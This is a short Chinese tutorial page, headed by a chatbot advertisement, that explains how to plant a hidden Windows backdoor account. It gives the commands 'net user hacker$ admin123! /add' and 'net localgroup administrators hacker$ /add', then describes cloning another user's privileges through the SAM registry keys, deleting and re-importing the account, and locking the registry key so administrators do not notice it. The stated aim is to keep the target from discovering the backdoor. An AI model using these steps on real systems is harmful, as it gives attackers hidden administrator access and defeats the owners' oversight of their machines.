ThinkChat2.0新版上线,更智能更精彩,支持会话、画图、视频、阅读、搜索等,送10W Token,即刻开启你的AI之旅 广告
[TOC] ## 原理 普通增加用户,会在net中显示,如果利用隐藏账户,会在管理当中显示用户,所以**利用注册表和隐藏用户配合使用,这样能够使得目标发现不了存在的后门账户** ## 利用 ~~~ 增加隐藏用户 net user hacker$ admin123! /add 加入管理员组 net localgroup administrators hacker$ /add 打开注册表 HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names 克隆权限 将需要克隆的用户(如lily),对应键值的F选项的权限信息替换掉 hacker$ 的权限信息 导出注册表 讲权限和用户名两个注册表导出 命令行删除账户 net user hacker$ /del 打开注册表,重新导入注册表 选择文件,导入,这样在重新利用刚刚创建的账户就可以登陆克隆的权限的用户 设置管理员不能放问该注册表 这样能够让自己的后门更加隐蔽,一般发现不了 ~~~